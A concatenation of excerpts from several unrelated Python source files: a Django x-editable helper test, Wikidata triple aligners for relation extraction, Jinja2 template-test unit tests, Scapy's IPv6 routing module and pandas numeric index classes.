'url': "URL DATA",
'source': "SOURCE DATA",
'title': "TITLE DATA",
'placeholder': "PLACEHOLDER DATA",
# Extra stuff not anticipated to appear in the rendered string
'special': "SPECIAL DATA",
'data_custom': "DATA-CUSTOM DATA",
}
secondary_helper = helper(**kwargs)
output = secondary_helper(data, **internals)
expected_output = """
<a href="#" data-name="name"
data-pk="PK DATA"
data-placeholder="PLACEHOLDER DATA"
data-source="SOURCE DATA"
data-title="TITLE DATA"
data-type="TYPE DATA"
data-url="URL DATA"
data-value="1"
data-xeditable="xeditable">
ExampleModel 1
</a>
"""
self.assertHTMLEqual(output, expected_output)
# Verify that explicit additions via ``extra_attrs`` allows kwargs to appear in HTML as
# "data-*" attributes.
secondary_helper = helper(extra_attrs=['special', 'data_custom', 'fake'], **kwargs)
output = secondary_helper(data, **internals)
expected_output = """
<a href="#" data-name="name"
data-pk="PK DATA"
data-placeholder="PLACEHOLDER DATA"
data-source="SOURCE DATA"
data-title="TITLE DATA"
data-type="TYPE DATA"
data-url="URL DATA"
data-value="1"
data-special="SPECIAL DATA"
data-custom="DATA-CUSTOM DATA"
data-xeditable="xeditable">
ExampleModel 1
</a>
"""
self.assertHTMLEqual(output, expected_output)
|
|
from pipeline import *
from utils import triplereader
import itertools
class NoSubjectAlign(BasePipeline):
"""
Following the assumption in NoSUB [1] and [2] that all sentences in one paragraph share the same subject.
[1] Augenstein, Isabelle, Diana Maynard, and Fabio Ciravegna. "Distantly supervised web relation extraction for knowledge base population." Semantic Web 7.4 (2016): 335-349.
[2] WikiReading: A Novel Large-scale Language Understanding Task over Wikipedia Hewlett et al. 2016
"""
def __init__(self, triples_reference):
self.annotator_name = "NoSubject-Triple-aligner"
# pd.read_csv(triples_file, sep="\t", names=["subject", "predicate", "object"]).set_index(['subject', 'object'])
self.wikidata_triples = triples_reference
def run(self, document):
"""
:param: input document to align its sentences with triples
:return:
"""
for sid, (start, end) in enumerate(document.sentences_boundaries):
# Getting sentence subject
# Every sentence has main entity as subject
# if subject already tagged use it if not use only the URI
# entities in sentence
es = [j for j in document.entities if j.boundaries[0] >= start and j.boundaries[1] <= end]
e_sub = [j for j in es if j.uri == document.uri]
if len(e_sub) > 0:
subject = e_sub[0]
else:
subject = Entity(document.uri,
boundaries=None,
surfaceform=document.title,
annotator=self.annotator_name)
for o in es:
if subject.uri == o.uri:
continue
predicates = self.wikidata_triples.get(subject.uri, o.uri)
#predicates = self.wikidata_triples["%s\t%s" % (subject.uri, o.uri)]
for pred in predicates:
pred = Entity(pred,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subject,
predicate=pred,
object=o,
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
class SimpleAligner(BasePipeline):
"""
Take a document with tagged entities and match them with one another.
Example: if we have three entities Q1, Q2 and Q3, it will try to find a
property binding Q1 with Q2, Q2 with Q1, Q2 with Q3, and so on.
It won't match an entity with itself, but if Q1 == Q2 it will still try to
find a property between them.
"""
def __init__(self, triples_reference):
"""
:param triples_reference: reference store of knowledge-base triples (two entities and
the property that binds them together)
"""
self.annotator_name = "Simple-Aligner"
self.wikidata_triples = triples_reference
def run(self, document):
"""
:param: input document to align its sentences with triples
:return:
"""
for sid, (start, end) in enumerate(document.sentences_boundaries):
es = [j for j in document.entities if j.boundaries[0] >= start and j.boundaries[1] <= end]
# We use permutations to match every entity with all the others
for o in itertools.permutations(es, 2):
if o[0].uri == o[1].uri:
continue
# We grab the predicates
#predicates = self.wikidata_triples["%s\t%s" % (o[0].uri, o[1].uri)]
predicates = self.wikidata_triples.get(o[0].uri, o[1].uri)
# And create the triples
for pred in predicates:
pred = Entity(pred,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=o[0],
predicate=pred,
object=o[1],
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
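# Illustrative sketch (not part of the original pipeline): the pairing strategy
# described in the SimpleAligner docstring above. itertools.permutations yields
# every ordered pair of distinct positions, so Q1/Q2 is tried in both directions;
# pairs that share the same URI are skipped inside run().
def _simple_aligner_pairing_demo():
    uris = ["Q1", "Q2", "Q3"]
    # -> [('Q1', 'Q2'), ('Q1', 'Q3'), ('Q2', 'Q1'), ('Q2', 'Q3'), ('Q3', 'Q1'), ('Q3', 'Q2')]
    return [(a, b) for a, b in itertools.permutations(uris, 2) if a != b]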
class SPOAligner(BasePipeline):
def __init__(self, triples_reference):
self.annotator_name = "SPOAligner"
# Add here the names of the annotators that create entities other than properties
self.annotator_list = ["Wikidata_Spotlight_Entity_Linker", "Simple_Coreference", "Date_Linker"]
self.wikidata_triples = triples_reference
def run(self, document):
for sid, (start, end) in enumerate(document.sentences_boundaries):
# Entities created by the Entity linkers and the Coreference
es = [j for j in document.entities if j.boundaries[0] >= start
and j.boundaries[1] <= end
and j.annotator in self.annotator_list]
# Entities created by the Property Linker
p = [j for j in document.entities if j.boundaries[0] >= start
and j.boundaries[1] <= end
and j.annotator == 'Wikidata_Property_Linker']
for o in itertools.permutations(es, 2):
if o[0].uri == o[1].uri:
continue
predicates = self.wikidata_triples.get(o[0].uri, o[1].uri)
#predicates = self.wikidata_triples["%s\t%s" % (o[0].uri, o[1].uri)]
# And create the triples
for kbpred in predicates:
for spred in p:
if kbpred == spred.uri:
triple = Triple(subject=o[0],
predicate=spred,
object=o[1],
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
class NoAligner(BasePipeline):
"""
Take a document with tagged entities and add the triples that are not
in the document, without alignment in the text.
"""
def __init__(self, all_triples):
"""
:param all_triples: store of all knowledge-base triples (two entities and
the property that binds them together)
"""
self.annotator_name = "No-Aligner"
self.wikidata_triples = all_triples
def makeTriple(self, s, p, o):
subj = Entity(s,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
pred = Entity(p,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
obj = Entity(o,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subj,
predicate=pred,
object=obj,
sentence_id=None,
annotator=self.annotator_name)
return triple
def run(self, document):
tall = []
tagged_entities = set([e.uri for e in document.entities])
for t in self.wikidata_triples.get(document.docid):
# NoAligner adds a triple only if:
# - document.uri is the subject of the triple, or
# - document.uri is the object of the triple and its subject is linked by an entity linker
if t[0] not in tagged_entities and t[2] == document.uri:
continue
tall.append(t[0]+"\t"+t[1]+"\t"+t[2])
tall = set(tall)
tdoc = set([t.subject.uri+"\t"+t.predicate.uri+"\t"+t.object.uri for t in document.triples])
tadd = tall - tdoc
for t in tadd:
triple = self.makeTriple(*t.split("\t"))
document.triples.append(triple)
return document
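# Illustrative sketch (not part of the original pipeline): NoAligner.run() above
# serialises triples as tab-joined "subject\tpredicate\tobject" strings and uses a
# set difference to find knowledge-base triples that are not yet aligned in the
# document. The URIs below are hypothetical.
def _no_aligner_set_difference_demo():
    kb_triples = {"Q1\tP31\tQ5", "Q1\tP27\tQ30"}
    already_in_document = {"Q1\tP31\tQ5"}
    missing = kb_triples - already_in_document
    # -> {'Q1\tP27\tQ30'}; each entry would then be expanded via makeTriple(*t.split("\t"))
    return missing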
class NoAlignerLimitedProperties(BasePipeline):
"""
Take a document with tagged entities and add the triples that are not
in the document, without alignment in the text.
Only triples whose properties already appear in a triple aligned with the
first sentence are added.
"""
def __init__(self, all_triples):
"""
:param all_triples: store of all knowledge-base triples (two entities and
the property that binds them together)
"""
self.annotator_name = "No-Aligner"
self.wikidata_triples = all_triples
def makeTriple(self, s, p, o):
subj = Entity(s,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
pred = Entity(p,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
obj = Entity(o,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subj,
predicate=pred,
object=obj,
sentence_id=None,
annotator=self.annotator_name)
return triple
# Get all properties that are used in the first sentence
def getAllowedProperties(self, triples):
allowed_properties = []
for t in triples:
if t.sentence_id == 0:
allowed_properties.append(t.predicate.uri)
return allowed_properties
def run(self, document):
allowed_properties = self.getAllowedProperties(document.triples)
for t in self.wikidata_triples.get(document.docid):
if not allowed_properties or t[1] not in allowed_properties:
continue
# TODO: Better comparison
exists = False
for doc_t in document.triples:
if doc_t.subject.uri == t[0] and doc_t.predicate.uri == t[1] and doc_t.object.uri == t[2]:
exists = True
if not exists:
triple = self.makeTriple(t[0], t[1], t[2])
document.triples.append(triple)
return document
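# Illustrative sketch (not part of the original pipeline): the "allowed properties"
# filter used by NoAlignerLimitedProperties keeps only predicates that already occur
# in a triple aligned with the first sentence (sentence_id == 0). A hypothetical
# lightweight stand-in for Triple is used here.
def _allowed_properties_demo():
    from collections import namedtuple
    FakeTriple = namedtuple("FakeTriple", ["predicate_uri", "sentence_id"])
    triples = [FakeTriple("P31", 0), FakeTriple("P27", 1), FakeTriple("P21", 0)]
    # -> ['P31', 'P21']
    return [t.predicate_uri for t in triples if t.sentence_id == 0]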
|
|
import pytest
from markupsafe import Markup
from jinja2 import Environment
from jinja2 import TemplateAssertionError
from jinja2 import TemplateRuntimeError
class MyDict(dict):
pass
class TestTestsCase:
def test_defined(self, env):
tmpl = env.from_string("{{ missing is defined }}|{{ true is defined }}")
assert tmpl.render() == "False|True"
def test_even(self, env):
tmpl = env.from_string("""{{ 1 is even }}|{{ 2 is even }}""")
assert tmpl.render() == "False|True"
def test_odd(self, env):
tmpl = env.from_string("""{{ 1 is odd }}|{{ 2 is odd }}""")
assert tmpl.render() == "True|False"
def test_lower(self, env):
tmpl = env.from_string("""{{ "foo" is lower }}|{{ "FOO" is lower }}""")
assert tmpl.render() == "True|False"
# Test type checks
@pytest.mark.parametrize(
"op,expect",
(
("none is none", True),
("false is none", False),
("true is none", False),
("42 is none", False),
("none is true", False),
("false is true", False),
("true is true", True),
("0 is true", False),
("1 is true", False),
("42 is true", False),
("none is false", False),
("false is false", True),
("true is false", False),
("0 is false", False),
("1 is false", False),
("42 is false", False),
("none is boolean", False),
("false is boolean", True),
("true is boolean", True),
("0 is boolean", False),
("1 is boolean", False),
("42 is boolean", False),
("0.0 is boolean", False),
("1.0 is boolean", False),
("3.14159 is boolean", False),
("none is integer", False),
("false is integer", False),
("true is integer", False),
("42 is integer", True),
("3.14159 is integer", False),
("(10 ** 100) is integer", True),
("none is float", False),
("false is float", False),
("true is float", False),
("42 is float", False),
("4.2 is float", True),
("(10 ** 100) is float", False),
("none is number", False),
("false is number", True),
("true is number", True),
("42 is number", True),
("3.14159 is number", True),
("complex is number", True),
("(10 ** 100) is number", True),
("none is string", False),
("false is string", False),
("true is string", False),
("42 is string", False),
('"foo" is string', True),
("none is sequence", False),
("false is sequence", False),
("42 is sequence", False),
('"foo" is sequence', True),
("[] is sequence", True),
("[1, 2, 3] is sequence", True),
("{} is sequence", True),
("none is mapping", False),
("false is mapping", False),
("42 is mapping", False),
('"foo" is mapping', False),
("[] is mapping", False),
("{} is mapping", True),
("mydict is mapping", True),
("none is iterable", False),
("false is iterable", False),
("42 is iterable", False),
('"foo" is iterable', True),
("[] is iterable", True),
("{} is iterable", True),
("range(5) is iterable", True),
("none is callable", False),
("false is callable", False),
("42 is callable", False),
('"foo" is callable', False),
("[] is callable", False),
("{} is callable", False),
("range is callable", True),
),
)
def test_types(self, env, op, expect):
t = env.from_string(f"{{{{ {op} }}}}")
assert t.render(mydict=MyDict(), complex=complex(1, 2)) == str(expect)
def test_upper(self, env):
tmpl = env.from_string('{{ "FOO" is upper }}|{{ "foo" is upper }}')
assert tmpl.render() == "True|False"
def test_equalto(self, env):
tmpl = env.from_string(
"{{ foo is eq 12 }}|"
"{{ foo is eq 0 }}|"
"{{ foo is eq (3 * 4) }}|"
'{{ bar is eq "baz" }}|'
'{{ bar is eq "zab" }}|'
'{{ bar is eq ("ba" + "z") }}|'
"{{ bar is eq bar }}|"
"{{ bar is eq foo }}"
)
assert (
tmpl.render(foo=12, bar="baz")
== "True|False|True|True|False|True|True|False"
)
@pytest.mark.parametrize(
"op,expect",
(
("eq 2", True),
("eq 3", False),
("ne 3", True),
("ne 2", False),
("lt 3", True),
("lt 2", False),
("le 2", True),
("le 1", False),
("gt 1", True),
("gt 2", False),
("ge 2", True),
("ge 3", False),
),
)
def test_compare_aliases(self, env, op, expect):
t = env.from_string(f"{{{{ 2 is {op} }}}}")
assert t.render() == str(expect)
def test_sameas(self, env):
tmpl = env.from_string("{{ foo is sameas false }}|{{ 0 is sameas false }}")
assert tmpl.render(foo=False) == "True|False"
def test_no_paren_for_arg1(self, env):
tmpl = env.from_string("{{ foo is sameas none }}")
assert tmpl.render(foo=None) == "True"
def test_escaped(self, env):
env = Environment(autoescape=True)
tmpl = env.from_string("{{ x is escaped }}|{{ y is escaped }}")
assert tmpl.render(x="foo", y=Markup("foo")) == "False|True"
def test_greaterthan(self, env):
tmpl = env.from_string("{{ 1 is greaterthan 0 }}|{{ 0 is greaterthan 1 }}")
assert tmpl.render() == "True|False"
def test_lessthan(self, env):
tmpl = env.from_string("{{ 0 is lessthan 1 }}|{{ 1 is lessthan 0 }}")
assert tmpl.render() == "True|False"
def test_multiple_tests(self):
items = []
def matching(x, y):
items.append((x, y))
return False
env = Environment()
env.tests["matching"] = matching
tmpl = env.from_string(
"{{ 'us-west-1' is matching '(us-east-1|ap-northeast-1)'"
" or 'stage' is matching '(dev|stage)' }}"
)
assert tmpl.render() == "False"
assert items == [
("us-west-1", "(us-east-1|ap-northeast-1)"),
("stage", "(dev|stage)"),
]
def test_in(self, env):
tmpl = env.from_string(
'{{ "o" is in "foo" }}|'
'{{ "foo" is in "foo" }}|'
'{{ "b" is in "foo" }}|'
"{{ 1 is in ((1, 2)) }}|"
"{{ 3 is in ((1, 2)) }}|"
"{{ 1 is in [1, 2] }}|"
"{{ 3 is in [1, 2] }}|"
'{{ "foo" is in {"foo": 1}}}|'
'{{ "baz" is in {"bar": 1}}}'
)
assert tmpl.render() == "True|True|False|True|False|True|False|True|False"
def test_name_undefined(env):
with pytest.raises(TemplateAssertionError, match="No test named 'f'"):
env.from_string("{{ x is f }}")
def test_name_undefined_in_if(env):
t = env.from_string("{% if x is defined %}{{ x is f }}{% endif %}")
assert t.render() == ""
with pytest.raises(TemplateRuntimeError, match="No test named 'f'"):
t.render(x=1)
def test_is_filter(env):
assert env.call_test("filter", "title")
assert not env.call_test("filter", "bad-name")
def test_is_test(env):
assert env.call_test("test", "number")
assert not env.call_test("test", "bad-name")
|
|
## This file is part of Scapy
## See http://www.secdev.org/projects/scapy for more information
## Copyright (C) Philippe Biondi <[email protected]>
## This program is published under a GPLv2 license
## Copyright (C) 2005 Guillaume Valadon <[email protected]>
## Arnaud Ebalard <[email protected]>
"""
Routing and network interface handling for IPv6.
"""
#############################################################################
#############################################################################
### Routing/Interfaces stuff ###
#############################################################################
#############################################################################
import socket
from config import conf
from utils6 import *
from arch import *
class Route6:
def __init__(self):
self.invalidate_cache()
self.resync()
def invalidate_cache(self):
self.cache = {}
def flush(self):
self.invalidate_cache()
self.routes = []
def resync(self):
# TODO : At the moment, resync will drop existing Teredo routes
# if any. Change that ...
self.invalidate_cache()
self.routes = read_routes6()
if self.routes == []:
log_loading.info("No IPv6 support in kernel")
def __repr__(self):
rtlst = [('Destination', 'Next Hop', "iface", "src candidates")]
for net,msk,gw,iface,cset in self.routes:
rtlst.append(('%s/%i'% (net,msk), gw, iface, ", ".join(cset)))
colwidth = map(lambda x: max(map(lambda y: len(y), x)), apply(zip, rtlst))
fmt = " ".join(map(lambda x: "%%-%ds"%x, colwidth))
rt = "\n".join(map(lambda x: fmt % x, rtlst))
return rt
# Unlike Scapy's Route.make_route() function, we do not have 'host' and 'net'
# parameters. We only have a 'dst' parameter that accepts 'prefix' and
# 'prefix/prefixlen' values.
# WARNING: Providing a specific device will at the moment not work correctly.
def make_route(self, dst, gw=None, dev=None):
"""Internal function : create a route for 'dst' via 'gw'.
"""
prefix, plen = (dst.split("/")+["128"])[:2]
plen = int(plen)
if gw is None:
gw = "::"
if dev is None:
dev, ifaddr, x = self.route(gw)
else:
# TODO: do better than that
# replace that unique address by the list of all addresses
lifaddr = in6_getifaddr()
devaddrs = filter(lambda x: x[2] == dev, lifaddr)
ifaddr = construct_source_candidate_set(prefix, plen, devaddrs, LOOPBACK_NAME)
return (prefix, plen, gw, dev, ifaddr)
def add(self, *args, **kargs):
"""Ex:
add(dst="2001:db8:cafe:f000::/56")
add(dst="2001:db8:cafe:f000::/56", gw="2001:db8:cafe::1")
add(dst="2001:db8:cafe:f000::/64", gw="2001:db8:cafe::1", dev="eth0")
"""
self.invalidate_cache()
self.routes.append(self.make_route(*args, **kargs))
def delt(self, dst, gw=None):
""" Ex:
delt(dst="::/0")
delt(dst="2001:db8:cafe:f000::/56")
delt(dst="2001:db8:cafe:f000::/56", gw="2001:db8:deca::1")
"""
tmp = dst+"/128"
dst, plen = tmp.split('/')[:2]
dst = in6_ptop(dst)
plen = int(plen)
l = filter(lambda x: in6_ptop(x[0]) == dst and x[1] == plen, self.routes)
if gw:
gw = in6_ptop(gw)
l = filter(lambda x: in6_ptop(x[2]) == gw, l)
if len(l) == 0:
warning("No matching route found")
elif len(l) > 1:
warning("Found more than one match. Aborting.")
else:
i=self.routes.index(l[0])
self.invalidate_cache()
del(self.routes[i])
def ifchange(self, iff, addr):
the_addr, the_plen = (addr.split("/")+["128"])[:2]
the_plen = int(the_plen)
naddr = inet_pton(socket.AF_INET6, the_addr)
nmask = in6_cidr2mask(the_plen)
the_net = inet_ntop(socket.AF_INET6, in6_and(nmask,naddr))
for i, route in enumerate(self.routes):
net,plen,gw,iface,addr = route
if iface != iff:
continue
if gw == '::':
self.routes[i] = (the_net,the_plen,gw,iface,the_addr)
else:
self.routes[i] = (net,the_plen,gw,iface,the_addr)
self.invalidate_cache()
ip6_neigh_cache.flush()
def ifdel(self, iff):
""" removes all route entries that uses 'iff' interface. """
new_routes=[]
for rt in self.routes:
if rt[3] != iff:
new_routes.append(rt)
self.invalidate_cache()
self.routes = new_routes
def ifadd(self, iff, addr):
"""
Add an interface 'iff' with provided address into routing table.
Ex: ifadd('eth0', '2001:bd8:cafe:1::1/64') will add the following entry into
Scapy6 internal routing table:
Destination Next Hop iface Def src @
2001:bd8:cafe:1::/64 :: eth0 2001:bd8:cafe:1::1
prefix length value can be omitted. In that case, a value of 128
will be used.
"""
addr, plen = (addr.split("/")+["128"])[:2]
addr = in6_ptop(addr)
plen = int(plen)
naddr = inet_pton(socket.AF_INET6, addr)
nmask = in6_cidr2mask(plen)
prefix = inet_ntop(socket.AF_INET6, in6_and(nmask,naddr))
self.invalidate_cache()
self.routes.append((prefix,plen,'::',iff,[addr]))
def route(self, dst, dev=None):
"""
Provide best route to IPv6 destination address, based on Scapy6
internal routing table content.
When a set of addresses is passed (e.g. 2001:db8:cafe:*::1-5), one address
of the set is used. Be aware of that behavior when using wildcards in
the upper parts of addresses!
If the 'dst' parameter is an FQDN, name resolution is performed and the
result is used.
If the optional 'dev' parameter specifies an interface, filtering
is performed to limit the search to routes associated with that interface.
"""
# Transform "2001:db8:cafe:*::1-5:0/120" to one IPv6 address of the set
dst = dst.split("/")[0]
savedst = dst # In case following inet_pton() fails
dst = dst.replace("*","0")
l = dst.find("-")
while l >= 0:
m = (dst[l:]+":").find(":")
dst = dst[:l]+dst[l+m:]
l = dst.find("-")
try:
inet_pton(socket.AF_INET6, dst)
except socket.error:
dst = socket.getaddrinfo(savedst, None, socket.AF_INET6)[0][-1][0]
# TODO : Check if name resolution went well
# Deal with dev-specific request for cache search
k = dst
if dev is not None:
k = dst + "%%" + dev
if k in self.cache:
return self.cache[k]
pathes = []
# TODO : review all kinds of addresses (scope and *cast) to see
# if we are able to cope with everything possible. I'm convinced
# it's not the case.
# -- arnaud
for p, plen, gw, iface, cset in self.routes:
if dev is not None and iface != dev:
continue
if in6_isincluded(dst, p, plen):
pathes.append((plen, (iface, cset, gw)))
elif (in6_ismlladdr(dst) and in6_islladdr(p) and in6_islladdr(cset[0])):
pathes.append((plen, (iface, cset, gw)))
if not pathes:
warning("No route found for IPv6 destination %s (no default route?)" % dst)
return (LOOPBACK_NAME, "::", "::") # XXX Linux specific
# Sort with longest prefix first
pathes.sort(reverse=True)
best_plen = pathes[0][0]
pathes = filter(lambda x: x[0] == best_plen, pathes)
res = []
for p in pathes: # Here we select best source address for every route
tmp = p[1]
srcaddr = get_source_addr_from_candidate_set(dst, p[1][1])
if srcaddr is not None:
res.append((p[0], (tmp[0], srcaddr, tmp[2])))
if res == []:
warning("Found a route for IPv6 destination '%s', but no possible source address." % dst)
return (LOOPBACK_NAME, "::", "::") # XXX Linux specific
# Symptom : 2 routes with same weight (our weight is plen)
# Solution :
# - dst is unicast global. Check if it is 6to4 and we have a source
# 6to4 address in those available
# - dst is link local (unicast or multicast) and multiple output
# interfaces are available. Take main one (conf.iface6)
# - if none of the previous or ambiguity persists, be lazy and keep
# first one
# XXX TODO : in a _near_ future, include metric in the game
if len(res) > 1:
tmp = []
if in6_isgladdr(dst) and in6_isaddr6to4(dst):
# TODO : see if taking the longest match between dst and
# every source addresses would provide better results
tmp = filter(lambda x: in6_isaddr6to4(x[1][1]), res)
elif in6_ismaddr(dst) or in6_islladdr(dst):
# TODO : I'm sure we are not covering all addresses. Check that
tmp = filter(lambda x: x[1][0] == conf.iface6, res)
if tmp:
res = tmp
# Fill the cache (including dev-specific request)
k = dst
if dev is not None:
k = dst + "%%" + dev
self.cache[k] = res[0][1]
return res[0][1]
conf.route6 = Route6()
_res = conf.route6.route("::/0")
if _res:
iff, gw, addr = _res
conf.iface6 = iff
del(_res)
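# Illustrative sketch (not part of Scapy): the selection step used by Route6.route()
# once candidate routes have been gathered. Candidates are (plen, route_info) tuples;
# sorting in reverse order puts the longest prefix first, and only candidates sharing
# that best prefix length are kept for source-address selection. The routes below are
# hypothetical.
def _longest_prefix_selection_demo():
    candidates = [(0, ("eth0", "::/0 (default)")),
                  (56, ("eth1", "2001:db8:cafe:f000::/56")),
                  (64, ("eth0", "2001:db8:cafe:f000::/64"))]
    candidates.sort(reverse=True)
    best_plen = candidates[0][0]
    # -> [(64, ('eth0', '2001:db8:cafe:f000::/64'))]
    return [c for c in candidates if c[0] == best_plen]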
|
|
from typing import Any
import numpy as np
from pandas._libs import index as libindex, lib
from pandas._typing import Dtype, Label
from pandas.util._decorators import cache_readonly, doc
from pandas.core.dtypes.cast import astype_nansafe
from pandas.core.dtypes.common import (
is_bool,
is_bool_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_float,
is_float_dtype,
is_integer_dtype,
is_scalar,
is_signed_integer_dtype,
is_unsigned_integer_dtype,
needs_i8_conversion,
pandas_dtype,
)
from pandas.core.dtypes.generic import (
ABCFloat64Index,
ABCInt64Index,
ABCRangeIndex,
ABCSeries,
ABCUInt64Index,
)
from pandas.core.dtypes.missing import isna
from pandas.core import algorithms
import pandas.core.common as com
from pandas.core.indexes.base import Index, maybe_extract_name
from pandas.core.ops import get_op_result_name
_num_index_shared_docs = dict()
class NumericIndex(Index):
"""
Provide numeric type operations.
This is an abstract class.
"""
_is_numeric_dtype = True
def __new__(cls, data=None, dtype=None, copy=False, name=None):
cls._validate_dtype(dtype)
name = maybe_extract_name(name, data, cls)
# Coerce to ndarray if not already ndarray or Index
if not isinstance(data, (np.ndarray, Index)):
if is_scalar(data):
raise cls._scalar_data_error(data)
# other iterable of some kind
if not isinstance(data, (ABCSeries, list, tuple)):
data = list(data)
data = np.asarray(data, dtype=dtype)
if issubclass(data.dtype.type, str):
cls._string_data_error(data)
if copy or not is_dtype_equal(data.dtype, cls._default_dtype):
subarr = np.array(data, dtype=cls._default_dtype, copy=copy)
cls._assert_safe_casting(data, subarr)
else:
subarr = data
if subarr.ndim > 1:
# GH#13601, GH#20285, GH#27125
raise ValueError("Index data must be 1-dimensional")
subarr = np.asarray(subarr)
return cls._simple_new(subarr, name=name)
@classmethod
def _validate_dtype(cls, dtype: Dtype) -> None:
if dtype is None:
return
validation_metadata = {
"int64index": (is_signed_integer_dtype, "signed integer"),
"uint64index": (is_unsigned_integer_dtype, "unsigned integer"),
"float64index": (is_float_dtype, "float"),
"rangeindex": (is_signed_integer_dtype, "signed integer"),
}
validation_func, expected = validation_metadata[cls._typ]
if not validation_func(dtype):
raise ValueError(
f"Incorrect `dtype` passed: expected {expected}, received {dtype}"
)
@doc(Index._maybe_cast_slice_bound)
def _maybe_cast_slice_bound(self, label, side, kind):
assert kind in ["loc", "getitem", None]
# we will try to coerce to integers
return self._maybe_cast_indexer(label)
@doc(Index._shallow_copy)
def _shallow_copy(self, values=None, name: Label = lib.no_default):
if values is not None and not self._can_hold_na and values.dtype.kind == "f":
name = self.name if name is lib.no_default else name
# Ensure we are not returning an Int64Index with float data:
return Float64Index._simple_new(values, name=name)
return super()._shallow_copy(values=values, name=name)
def _convert_for_op(self, value):
"""
Convert value to be insertable to ndarray.
"""
if is_bool(value) or is_bool_dtype(value):
# force conversion to object
# so we don't lose the bools
raise TypeError
return value
def _convert_tolerance(self, tolerance, target):
tolerance = np.asarray(tolerance)
if target.size != tolerance.size and tolerance.size > 1:
raise ValueError("list-like tolerance size must match target index size")
if not np.issubdtype(tolerance.dtype, np.number):
if tolerance.ndim > 0:
raise ValueError(
f"tolerance argument for {type(self).__name__} must contain "
"numeric elements if it is list type"
)
else:
raise ValueError(
f"tolerance argument for {type(self).__name__} must be numeric "
f"if it is a scalar: {repr(tolerance)}"
)
return tolerance
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
Subclasses need to override this only if the process of casting data
from some accepted dtype to the internal dtype(s) bears the risk of
truncation (e.g. float to int).
"""
pass
@property
def is_all_dates(self) -> bool:
"""
Checks that all the labels are datetime objects.
"""
return False
@doc(Index.insert)
def insert(self, loc: int, item):
# treat NA values as nans:
if is_scalar(item) and isna(item):
item = self._na_value
return super().insert(loc, item)
def _union(self, other, sort):
# Right now, we treat union(int, float) a bit special.
# See https://github.com/pandas-dev/pandas/issues/26778 for discussion
# We may change union(int, float) to go to object.
# float | [u]int -> float (the special case)
# <T> | <T> -> T
# <T> | <U> -> object
needs_cast = (is_integer_dtype(self.dtype) and is_float_dtype(other.dtype)) or (
is_integer_dtype(other.dtype) and is_float_dtype(self.dtype)
)
if needs_cast:
first = self.astype("float")
second = other.astype("float")
return first._union(second, sort)
else:
return super()._union(other, sort)
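# Illustrative sketch (not part of pandas itself): the int/float special case in
# NumericIndex._union above means that the union of an integer index and a float
# index is upcast to Float64Index rather than falling back to object dtype.
# Assumes a standard pandas installation; the function name is for illustration only.
def _union_upcast_demo():
    import pandas as pd
    left = pd.Index([1, 2, 3])        # Int64Index
    right = pd.Index([2.5, 3.5])      # Float64Index
    result = left.union(right)        # float | [u]int -> float
    assert result.dtype == "float64"
    return result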
_num_index_shared_docs[
"class_descr"
] = """
Immutable ndarray implementing an ordered, sliceable set. The basic object
storing axis labels for all pandas objects. %(klass)s is a special case
of `Index` with purely %(ltype)s labels. %(extra)s.
Parameters
----------
data : array-like (1-dimensional)
dtype : NumPy dtype (default: %(dtype)s)
copy : bool
Make a copy of input ndarray.
name : object
Name to be stored in the index.
Attributes
----------
None
Methods
-------
None
See Also
--------
Index : The base pandas Index type.
Notes
-----
An Index instance can **only** contain hashable objects.
"""
_int64_descr_args = dict(klass="Int64Index", ltype="integer", dtype="int64", extra="")
class IntegerIndex(NumericIndex):
"""
This is an abstract class for Int64Index, UInt64Index.
"""
_default_dtype: np.dtype
def __contains__(self, key) -> bool:
"""
Check if key is a float and has a decimal. If it has, return False.
"""
hash(key)
try:
if is_float(key) and int(key) != key:
return False
return key in self._engine
except (OverflowError, TypeError, ValueError):
return False
@property
def inferred_type(self) -> str:
"""
Always 'integer' for ``Int64Index`` and ``UInt64Index``
"""
return "integer"
@property
def asi8(self) -> np.ndarray:
# do not cache or you'll create a memory leak
return self._values.view(self._default_dtype)
class Int64Index(IntegerIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _int64_descr_args
_typ = "int64index"
_can_hold_na = False
_engine_type = libindex.Int64Engine
_default_dtype = np.dtype(np.int64)
def _wrap_joined_index(self, joined, other):
name = get_op_result_name(self, other)
return Int64Index(joined, name=name)
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
Ensure incoming data can be represented as ints.
"""
if not issubclass(data.dtype.type, np.signedinteger):
if not np.array_equal(data, subarr):
raise TypeError("Unsafe NumPy casting, you must explicitly cast")
def _is_compatible_with_other(self, other) -> bool:
return super()._is_compatible_with_other(other) or all(
isinstance(obj, (ABCInt64Index, ABCFloat64Index, ABCRangeIndex))
for obj in [self, other]
)
Int64Index._add_numeric_methods()
Int64Index._add_logical_methods()
_uint64_descr_args = dict(
klass="UInt64Index", ltype="unsigned integer", dtype="uint64", extra=""
)
class UInt64Index(IntegerIndex):
__doc__ = _num_index_shared_docs["class_descr"] % _uint64_descr_args
_typ = "uint64index"
_can_hold_na = False
_engine_type = libindex.UInt64Engine
_default_dtype = np.dtype(np.uint64)
@doc(Index._convert_arr_indexer)
def _convert_arr_indexer(self, keyarr):
# Cast the indexer to uint64 if possible so that the values returned
# from indexing are also uint64.
dtype = None
if is_integer_dtype(keyarr) or (
lib.infer_dtype(keyarr, skipna=False) == "integer"
):
dtype = np.uint64
return com.asarray_tuplesafe(keyarr, dtype=dtype)
@doc(Index._convert_index_indexer)
def _convert_index_indexer(self, keyarr):
# Cast the indexer to uint64 if possible so
# that the values returned from indexing are
# also uint64.
if keyarr.is_integer():
return keyarr.astype(np.uint64)
return keyarr
def _wrap_joined_index(self, joined, other):
name = get_op_result_name(self, other)
return UInt64Index(joined, name=name)
@classmethod
def _assert_safe_casting(cls, data, subarr):
"""
